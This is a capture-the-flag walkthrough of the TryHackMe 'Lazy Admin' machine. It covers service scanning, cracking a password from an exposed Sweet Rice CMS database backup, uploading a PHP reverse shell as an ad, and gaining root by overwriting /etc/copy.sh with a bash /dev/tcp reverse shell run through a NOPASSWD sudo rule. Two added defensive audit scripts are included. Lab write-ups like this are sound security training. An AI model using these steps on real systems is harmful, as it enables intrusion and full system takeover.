# Lazy Admin

[Room](https://tryhackme.com/room/lazyadmin) Covers:

* Service Discovery
* Finding Vulnerabilities
* Exploitation
* Privilege Escalation

## Target Details

* IP: 10.10.209.190

## Service Discovery

* Using nmap

  ```bash
  nmap -sV -sC -Pn -oN nmap.txt 10.10.209.190
  ```
* Services Discovered

  | Service | Port | Version             |
  | :-----: | :--: | ------------------- |
  |   SSH   |  22  | OpenSSH 7.2p2       |
  |   HTTP  |  80  | Apache httpd 2.4.18 |
* Finding Directories on HTTP server using GoBuster

  ```bash
  gobuster dir -u http://10.10.209.190/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt
  ```

  > Directories Discovered: `/content`
* On visiting the `/content` page, we find the server is running Basic CMS with Sweet Rice installed

## Finding Vulnerabilities

* First vulnerability: visiting `/content/inc/mysql_backup/` exposes an SQL database backup file, from which we get a username and password hash; the hash is easily cracked online using tools such as [crackstation](https://crackstation.net/)

  | username |           password hash          |   password  |
  | :------: | :------------------------------: | :---------: |
  |  manager | 42f749ade7f9e195bf475f37a44cafcb | Passwordxxx |

  > We don't know the login page yet!
* Moving to the parent directory `/content/inc/`, we get directory listing access to all of its files, including `/content/inc/lastest.txt`, which reveals the Sweet Rice version: 1.5.1
* Searching for `Sweet Rice 1.5.1 vulnerabilities` in a search engine leads to the [File Upload](https://www.exploit-db.com/exploits/40716) exploit
* The exploit refers to the admin page as `/as`; on this target it is located at `/content/as`
* Visit `/content/as` and log in with the admin credentials recovered above
* Custom PHP code can be added from the ADS tab
* TL;DR

  |      Service     |                          Vulnerability                         |
  | :--------------: | :------------------------------------------------------------: |
  |    Sweet Rice    | [Backup Disclosure](https://www.exploit-db.com/exploits/40718) |
  | Sweet Rice 1.5.1 |    [File Upload](https://www.exploit-db.com/exploits/40716)    |
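The directory listing that exposed `/content/inc/` (and the backup under it) is a web server configuration issue rather than a code bug. The following script is an added example, not part of this writeup or of Sweet Rice or Apache: it audits an Apache config file for `Options` lines that enable `Indexes`, and writes a constructed weak/fixed config pair so it can be run offline. The `/var/www/html/content` path and the `FilesMatch` extension list are assumptions, not values from the target.

```bash
#!/bin/bash
# Added example, not part of the writeup: audit an Apache config for the
# directory-listing setting that let /content/inc/ be browsed on this target.
# Assumes a single plain-text config file (Include directives are not followed).

# Returns 1 and prints the offending lines when any Options directive enables
# Indexes (a bare "Indexes" or "+Indexes"); returns 0 when listing is off everywhere.
# "-Indexes" is deliberately not matched, since it disables listing.
audit_apache_indexes() {
    hits=$(grep -v '^[[:space:]]*#' "$1" \
        | grep -i '^[[:space:]]*Options' \
        | grep -E '(^|[[:space:]])\+?Indexes([[:space:]]|$)' || true)
    if [ -n "$hits" ]; then
        printf 'directory listing enabled in %s:\n%s\n' "$1" "$hits"
        return 1
    fi
    return 0
}

# Write a constructed pair of configs into DIR: weak.conf (listing on, as it was
# on the target) and fixed.conf (listing off and dump/backup files denied).
# Paths and extensions are sample values, not the target's real config.
write_sample_configs() {
    dir="$1"
    cat > "$dir/weak.conf" <<'EOF'
<Directory /var/www/html/content>
    Options Indexes FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
EOF
    cat > "$dir/fixed.conf" <<'EOF'
<Directory /var/www/html/content>
    # no automatic index page for directories that lack index.html/index.php
    Options -Indexes +FollowSymLinks
    AllowOverride None
    Require all granted
</Directory>
# never serve database dumps or backups even if they are left in the web root
<FilesMatch "\.(sql|bak|old|tar|gz|zip)$">
    Require all denied
</FilesMatch>
EOF
}

# Stand-alone demo: the weak config is flagged, the fixed one passes.
demo() {
    tmp=$(mktemp -d)
    write_sample_configs "$tmp"
    audit_apache_indexes "$tmp/weak.conf"  && echo "weak.conf: ok"  || echo "weak.conf: FLAGGED"
    audit_apache_indexes "$tmp/fixed.conf" && echo "fixed.conf: ok" || echo "fixed.conf: FLAGGED"
    rm -rf "$tmp"
}
demo
```

Pointing `audit_apache_indexes` at a real `apache2.conf` or virtual host file only covers that one file; on Debian/Ubuntu layouts you would run it over each file under `sites-enabled/` and `conf-enabled/` as well. Disabling `Indexes` does not remove the backup from the web root, which is why the fixed config also denies the dump extensions outright.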

## Exploitation

* Create a malicious advertisement containing a reverse shell
* Using the PentestMonkey [php reverse shell template](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php), we can get shell access by changing the `ip` variable to our attacker's VPN IP and then uploading it as an ad
* Start listener using netcat

  ```bash
  nc -nlvp 1234
  ```
* Requesting the uploaded file under `/content/inc/ads/` executes the reverse shell
* We have access to the shell

  ```bash
  listening on [any] 1234 ...
  connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 40312
  Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
   11:43:09 up  1:26,  0 users,  load average: 0.83, 0.30, 0.10
  USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  /bin/sh: 0: can't access tty; job control turned off

  $ sudo -l
  Matching Defaults entries for www-data on THM-Chal:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

  User www-data may run the following commands on THM-Chal:
      (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
  ```

  > We can run `/home/itguy/backup.pl` with `/usr/bin/perl` as root, without a password

## Privilege Escalation

* Finding Escalation Vectors: the `sudo -l` output above shows that `/usr/bin/perl /home/itguy/backup.pl` can be run as root without a password
* On the victim's shell

  ```bash
  # backup.pl executes /etc/copy.sh as root; overwrite it with a reverse shell to port 4444
  echo "/bin/bash -c 'exec bash -i &>/dev/tcp/[ATTACKER_VPN_IP]/4444 <&1'" > /etc/copy.sh

  # on attacker's machine start netcat listener session on port 4444
  # nc -nlvp 4444

  # execute reverse shell with sudo rights
  sudo /usr/bin/perl /home/itguy/backup.pl
  ```
* Root Shell on Attacker's machine

  ```bash
  nc -nlvp 4444
  listening on [any] 4444 ...
  connect to [10.x.x.x] from (UNKNOWN) [10.10.209.190] 52812
  bash: cannot set terminal process group (1058): Inappropriate ioctl for device
  bash: no job control in this shell
  root@THM-Chal:/#
  ```
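The escalation works because a NOPASSWD sudo rule runs a script that in turn executes a file a low-privileged user can rewrite. The script below is an added example, not from the writeup: it audits such a sudo target by checking the script itself and every absolute path it references for non-root ownership or group/other write bits, using a constructed `backup.pl`/`copy.sh` fixture in a temporary directory instead of the target's real files. It assumes GNU `stat` (Linux) and that the paths a script executes appear literally in its text.

```bash
#!/bin/bash
# Added example, not part of the writeup: audit a script that a sudo rule lets a
# low-privileged user run as root. The backup.pl rule on this target is
# exploitable only because a file it executes can be rewritten by www-data.
# Requires GNU stat (Linux); referenced paths must appear literally in the script.

# Returns 0 (true) when an octal mode string such as 644 or 4755 has the
# group or other write bit set.
writable_by_non_owner() {
    mode=$1
    group=$(( (mode / 10) % 10 ))
    other=$(( mode % 10 ))
    [ $(( (group & 2) | (other & 2) )) -ne 0 ]
}

# Returns 1 (with a reason) if FILE is missing, not owned by root, or writable
# by group/others; returns 0 when only root can change it.
check_root_only_writable() {
    file="$1"
    if [ ! -e "$file" ]; then
        echo "missing: $file"
        return 1
    fi
    owner=$(stat -c '%U' "$file")
    mode=$(stat -c '%a' "$file")
    if [ "$owner" != "root" ]; then
        echo "not owned by root (owner $owner): $file"
        return 1
    fi
    if writable_by_non_owner "$mode"; then
        echo "writable by group/others (mode $mode): $file"
        return 1
    fi
    return 0
}

# Check SCRIPT itself plus every existing absolute path it mentions (for example
# a system() call to a helper shell script). Returns 1 if any of them could be
# altered by a non-root user, which turns the sudo rule into a root shell.
audit_sudo_target() {
    script="$1"
    status=0
    check_root_only_writable "$script" || status=1
    for ref in $(grep -oE '/[A-Za-z0-9_./-]+' "$script" | sort -u); do
        [ -f "$ref" ] || continue        # skip paths that do not exist on this host
        check_root_only_writable "$ref" || status=1
    done
    return $status
}

# Stand-alone demo on a constructed fixture mirroring the target: a perl script
# that runs a helper shell script which anyone can write. Sample content only.
demo() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\necho "backup placeholder"\n' > "$tmp/copy.sh"
    chmod 666 "$tmp/copy.sh"                            # the misconfiguration
    printf '#!/usr/bin/perl\nsystem("sh %s");\n' "$tmp/copy.sh" > "$tmp/backup.pl"
    chmod 644 "$tmp/backup.pl"
    if audit_sudo_target "$tmp/backup.pl"; then
        echo "sudo target looks safe"
    else
        echo "UNSAFE sudo target: $tmp/backup.pl"
    fi
    rm -rf "$tmp"
}
demo
```

For a real review, feed `audit_sudo_target` every command path listed by `sudo -l` (or parsed from `/etc/sudoers` and `/etc/sudoers.d/`); the fix on this target is the same in every case, making the helper script root-owned and mode 755 or removing the NOPASSWD rule entirely.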

## Get Flags

* User Flag

  ```bash
  cat /home/itguy/user.txt
  # THM{63e5bce9271952xxxxxxxxxxxxxxxxxx}
  ```
* Root Flag

  ```bash
  cat /root/root.txt
  # THM{6637f41d0177bxxxxxxxxxxxxxxxxxxx}
  ```
